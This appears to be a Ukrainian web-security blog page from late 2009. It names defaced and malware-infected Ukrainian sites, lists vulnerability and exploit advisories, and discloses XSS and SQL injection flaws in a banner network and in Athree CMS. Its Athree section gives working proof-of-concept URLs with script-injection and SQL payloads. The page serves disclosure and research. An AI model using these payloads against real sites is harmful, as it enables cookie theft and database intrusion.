Websecurity - Веб безпека

В зв’язку з Новим Роком, що наближається, я поздоровляю вас з Новим Роком!

Бажаю всього найкращого вам в новому році і особливо безпеки вам і вашим сайтам .

Щоб в новому році ваші сайти не були серед числа похаканих чи інфікованих сайтів. Слідкуйте за безпекою власних сайтів і тоді з ними все буде добре.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://hyundai.com.ua (хакером Qasim) - причому спочатку сайт був взломаний 25.11.2009 Qasim, а 22.12.2009 взломаний mc_intikam. Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті
• http://dneprzori.com (хакером Black^Monster)
• http://www.koras.com.ua (хакером marslinio) - 20.12.2009, зараз сайт вже виправлений адмінами
• http://info.wols.com.ua (хакером Kam_06) - 22.12.2009, зараз сайт вже виправлений адмінами (сайт переїхав на інший домен)
• http://yoga.kr.ua (хакером Mr.D4rK) - 02.12.2009, зараз сайт вже виправлений адмінами

Виявлене переповнення буфера в модулі Perl DBD::Pg.

Уразливі версії: perl-DBD-Pg 2.x.

Переповнення буфера в pg_getline, DoS.

• Vulnerabilities in perl-DBD-Pg (деталі)

В даній добірці уразливості в веб додатках:

• Multiple Vulnerabilities in Cisco PIX and Cisco ASA (деталі)
• Backdoor in com_rsgallery2 gallery extension for joomla (деталі)
• Vanilla v.1.1.7 Cross-Site Scripting (деталі)
• AdPeeps 8.5d1 - XSS and HTML Injection Vulnerabilities (деталі)
• MULTIPLE REMOTE VULNERABILITIES Small Pirates v-2.1 (деталі)
• RCE vulnerability in ecshop 2.6.2 (деталі)
• A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability (деталі)
• MULTIPLE SQL INJECTION VULNERABILITIES Online Grades & Attendance v-3.2.6 (деталі)
• OCS Inventory NG 1.02 - Multiple SQL Injections (деталі)
• (Post Form –> Parent Register (name)) Credentials Changer (SQLi) EXPLOIT Online Grades & Attendance v-3.2.6 (деталі)

У травні, 05.05.2009, я знайшов численні Cross-Site Scripting уразливості на проекті http://c8.net.ua (банерна мережа). Про що найближчим часом сповіщу адміністрацію проекту.

Проблема така ж сама як і випадку численних уразливостей на www.banner.kiev.ua.

У флеш баннерах на b.c8.net.ua, які також доступні на c8.net.ua, є XSS уразливість. Якщо вони зроблені згідно з рекомендаціями банерної системи, то можлива XSS атака (strictly social XSS) через параметр url, або інші параметри (при кліку на банер). Про подібну атаку я вже писав в статті XSS уразливості в 8 мільйонах флеш файлах.

XSS (флешка з target = “_blank”):

• alert(’XSS’)
• alert(document.cookie)
• цікавий

Для різних флеш банерів URL сайта заноситься через різні параметри (url, link1, clickTAG або clickTag).

Google проіндексував на даному сайті 44 флеш банери, але їх може бути набагато більше. Файл банера, який я використав для прикладу, має ім’я 5371.swf, тобто в системі може бути більше 5000 уразливих флеш банерів.

Ще до виходу PHP 5.2.11 у вересні, вийшов PHP 5.3. Вихід нової гілки PHP відбувся 30.06.2009 і даний реліз є значним покращенням 5.x серії.

А вже у листопаді, 19.11.2009, вийшов PHP 5.3.1. В якому виправлено більше 100 помилок, в тому числі й декілька уразливостей. Даний реліз направлений на покращення стабільності та безпеки гілки 5.3.x.

Cеред секюріті покращень та виправлень в PHP 5.3.1:

• Додана “max_file_uploads” INI директива, що може бути задана для обмеження кількості завантажень файлів для кожного запиту до 20 по замовчуванню, для запобігання можливій DOS через вичерпання тимчасових файлів.
• Додані пропущені перевірки навколо обробки exif.
• Виправлений обхід safe_mode в tempnam().
• Виправлений обхід open_basedir в posix_mkfifo().
• Виправлений слабий safe_mode_include_dir.

По матеріалам http://www.php.net.

05.11.2009

У березні, 09.03.2009, я знайшов Cross-Site Scripting, SQL DB Structure Extaction та SQL Injection уразливості в системі Athree CMS (Athree CMS Lite). Як раз коли виявив уразливості на www.cctvua.com, де і використовується цей движок.

Раніше я вже писав про уразливості в Athree CMS.

Детальна інформація про уразливості з’явиться пізніше.

30.12.2009

XSS:

http://site/?p=1;c=1;s=28/*%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?p=1;c=0/*%3Cscript%3Ealert(document.cookie)%3C/script%3E;s=28
http://site/?p=1;c=0/*%3Cscript%3Edocument.location%3D'http://websecurity.com.ua'%3C/script%3E;s=28

SQL DB Structure Extraction:

http://site/?p=1;a=1′

SQL Injection:

http://site/?p=1;a=version()

В даній добірці експлоіти в веб додатках:

• Joomla Component com_jumi (fileid) Blind SQL Injection Exploit (деталі)
• The Recipe Script 5 Remote XSS Vulnerability (деталі)
• phportal v1 (topicler.php id) Remote SQL Injection Vulnerability (деталі)
• vBulletin Radio and TV Player Add-On HTML Injection Vulnerability (деталі)
• Netgear DG632 Router Remote Denial of Service Vulnerability (деталі)
• Netgear DG632 Router Authentication Bypass Vulnerability (деталі)
• phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln (деталі)
• Joomla Component com_ijoomla_rss Blind SQL Injection Exploit (деталі)
• XOOPS <= 2.3.3 Remote File Disclosure Vulnerability (.htaccess) (деталі)
• phpFK 7.03 (page_bottom.php) Local File Inclusion Vulnerability (деталі)
• phportal 1.0 Insecure Cookie Handling Vulnerability (деталі)
• FretsWeb 1.2 (name) Remote Blind SQL Injection Exploit (деталі)
• FretsWeb 1.2 Multiple Local File Inclusion Vulnerabilities (деталі)
• fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC (деталі)
• Exploits BLIND SQL INJECTION (GET var ‘AlbumID’) RTWebalbum 1.0.462 (деталі)

У травні, 05.05.2009, я знайшов Cross-Site Scripting, SQL DB Structure Extraction та SQL Injection уразливості на проекті http://mycityua.com (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.pk.kiev.ua (це попередній домен даного сайта).

Детальна інформація про уразливості з’явиться пізніше.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

Ось п’ятірка інфікованих сайтів в Уанеті:

• http://vip-love.com.ua - інфекція була виявлена 26.12.2009. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 2 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://bronedvery.com.ua - інфекція була виявлена 19.12.2009. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 4 рази протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
• http://viptourism.org.ua - інфекція була виявлена 17.12.2009. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 5 разів протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
• http://stroydetal.crimea.ua - інфекція була виявлена 28.12.2009. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
• http://concol.com.ua - інфекція була виявлена 20.10.2009. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 2 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.